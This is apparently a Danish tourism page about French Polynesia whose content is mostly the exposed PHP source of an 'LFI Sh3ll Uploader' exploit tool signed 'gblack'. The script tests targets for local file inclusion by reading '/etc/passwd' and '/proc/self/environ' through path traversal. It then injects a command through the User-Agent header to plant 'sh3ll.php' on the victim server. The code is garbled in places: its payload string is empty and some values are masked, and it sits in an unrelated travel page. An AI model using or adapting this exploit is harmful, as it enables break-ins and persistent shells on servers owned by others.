Oplev Fransk Polynesien

Portræt

Du er her : Oplev Fransk Polynesien > Portræt

Simple LFI Sh3ll Uploader <****>

Simple LFI Sh3ll Uploader

LFI URL:
"; $target = $_POST['lfiurl']; $testlfi = "../../../../../../../../../../../../../../../etc/passwd%00"; $readenv = "../../../../../../../../../../../../../../../proc/self/environ%00"; $mbooh = preg_split("/.php/", $target); $pecah = preg_split("///", $mbooh[0]); $path = "/"; $azz = count($pecah) - 1; for($g = 3; $g<$azz;$g++) { $path.= $pecah[$g]."/"; } $bug = $pecah[$azz].".php".$mbooh[1]; $host = $pecah[2]; print "[+] Testing LFI ... "; flush(); $res = FetchURL($target.$testlfi); if(preg_match("/root:x:0:0/", $res)) { print "Ok
[+] Reading /proc/self/environ ... "; flush(); $rez = FetchURL($target.$readenv); if(preg_match("/********_ROOT=/", $rez)) { print "Ok
[+] Exploiting target ...
"; flush(); $cmd = ""; $soket = fsockopen($host, 80); $req = "GET ".$path.$bug.$readenv." HTTP/1.0rnHost: ".$host."rnAccept: */*rnUser-Agent: ".$cmd."rnrn"; fputs($soket, $req); fclose($soket); flush(); $cek = FetchURL("http://".$host.$path."sh3ll.php"); if(preg_match("/gblack Was Here/", $cek)) { print "[+] Exploit successful!
[+] Shell uploaded to http://".$host.$path."sh3ll.php"; } else { print "[!] Exploit failed!
"; } } else { print "Failed
"; } } else { print "Failed
"; } } function FetchURL($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/3.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)"); curl_setopt($ch, CURLOPT_FOLLOW********, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $data = curl_exec($ch); if(!$data) { return false; } return $data; } ?>
Copyleft © 2010 by gblack

Hoteller, pensioner, aktiviteter

Vælg en ø og en aktivitet




Temps d'exécution du script : 3.8482940197 secondes